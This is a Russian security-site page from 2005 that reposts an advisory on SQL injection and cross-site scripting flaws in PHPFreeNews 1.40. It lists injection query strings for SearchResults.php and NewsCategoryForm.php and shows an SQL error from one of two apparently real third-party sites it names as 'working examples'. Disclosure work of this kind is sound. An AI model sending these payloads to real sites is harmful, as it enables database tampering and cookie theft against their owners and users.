СОДЕРЖАНИЕ:
  ДОМОЙ
  НОВОСТИ  
  IT АКАДЕМИЯ
  WAP-ВЕРСИЯ
  ФОРУМ
  БЕЗОПАСНОСТЬ
  ПРОГРАММИРОВАНИЕ
  ИНСТРУМЕНТ ВЕБМАСТЕРА
  ВСЁ ДЛЯ КПК
  СТАТЬИ NEW
  СОФТ
  ВИДЕО
  X-INFO
  ПРОКСИ ЛИСТ
  IT МУЗЫКА
  АНЕКДОТЫ
  ССЫЛКИ
  ТЕХ. ПОДДЕРЖКА
  ПРАВООБЛАДАТЕЛЯМ
  О НАС
ВАШ IP АДРЕС:
3.148.108.192
Человек на сайте На сайте: 248 человек(а)
Ђдминистрация никак не связан с авторами и содержимым ссылок
Рђеклама




Cервер : irc.comp-info.ru Порт : 6667 Канал : #comp-info


..:: Компьютерная безопасность ::..


Внимание !!! Attention !!!


Вся информация хранящаяся на сайте предоставлена исключительно в образовательных и познавательных целях. Мы рассчитываем на правильное ее использование, т. е. для повышения уровня защищенности компьютерных систем. Уважаемые посетители, мы надеемся на Вашу рассудительность. Администрация Comp-Info.ru снимает с себя ответственность за незаконное применение данных материалов. Мы хотим лишь ликвидировать необразованность администраторского состава, а так же помочь начинающим администраторам.

PHPFreeNews 1.40 несколько уязвимостей

8 ноября 2005 | ASSCOL | Security

Уязвимость в скрипте: SearchResults.PHP
Описание:
Уязвимость вызвана с недостаточным контролем входных данных скриптом SearchResults.PHP, и как следствие — успешная атака может привести к раскрытию или модификации информации в базе данных уязвимого приложения.

Рабочие примеры:
1. http://balkanakcija.com/phpfn/SearchRes…
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/balkanak/public_html/phpfn/Inc/ListingFunctions.php on line 86
Query failed : You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '''' IN BOOLEAN MODE) ORDER BY Sticky DESC, Priority, PostDate

2. Варианты:
/SearchResults.php?Match=1&NewsMode=1&SearchNews=Search&CatID='
/SearchResults.php?Match=%27&NewsMode=1&SearchNews=Search&CatID=0
/SearchResults.php?Match=1&NewsMode=1&SearchNews=Search&CatID=%27

Межсайтовый скриптинг в PHPFreeNews.

Уязвимость в скриптах: NewsCategoryForm.php и SearchResults.php
Описание:
Уязвимость связана с недостаточной фильтрацией входных данных. Успешная атака позволяет раскрыть информацию о других пользователях, путем внедрения вредоносной ссылки, и кражи cookie-файлов.

Рабочие примеры:
http://equateur.americas-fr.com/news/SearchR…
Варианты:
/NewsCategoryForm.php?NewsMode=">&CatID=0
/SearchResults.php?Match=1&NewsMode=1&SearchNews=Search&CatID='>
/SearchResults.php?Match=1&NewsMode=">&SearchNews=Search&CatID=0
/SearchResults.php?Match=">&NewsMode=1&SearchNews=Search&CatID=0

Решение:
На данный момент официального решения не существует.

**** ASSCOL ****

По всем вопросам и предложениям пишите на admin@comp-info.ru

/USR/MENU:
 ./HOME
 ./HOME/NEWS  
 ./HOME/IT_ACADEMY
 ./WAP
 ./FORUM
 ./SECURITY
 ./PROGRAMMING
 ./SOFT/4WEBMASTERS
 ./ALL4POCKETS
 ./USR/ARTICLESNEW
 ./TEMP/SOFT
 ./USR/ALL_VIDEO
 ./HOME/X-INFO
 ./TEMP/PROXYLIST
 ./IT_MUSIC
 ./JOKES
 ./HOME/LINKS
 ./USR/SUPPORT
 ./USR/POSSESSOR
 ./ABOUT_US
УТИЛИТЫ:

  Сниффер
  Лог сниффера
  MD5 и Base64
  Декодирование MD5 NEW
 Перекодировщик
  Проверить прокси
  Проверка анонимности
  Генерация пароля
  Скрипт определения IP
  Поиск информации
   Проверить IP (Whois)
   Узнать скорость закачки
   Добавить свой сайт в поисковые системы>
   Подсветка php-кода

ПОЛЕЗНАЯ ИНФОРМАЦИЯ:
  Список национальных доменных имен
  Компьютерные термины
  Смайлики
   Аналоги Win-программ в Linux
   Коды ответа HTTP сервера
   Записки невесты программиста

Опрос




Права на содержащиеся на сайте материалы принадлежат авторам.

Copyright Комп-Инфо.ру © 2005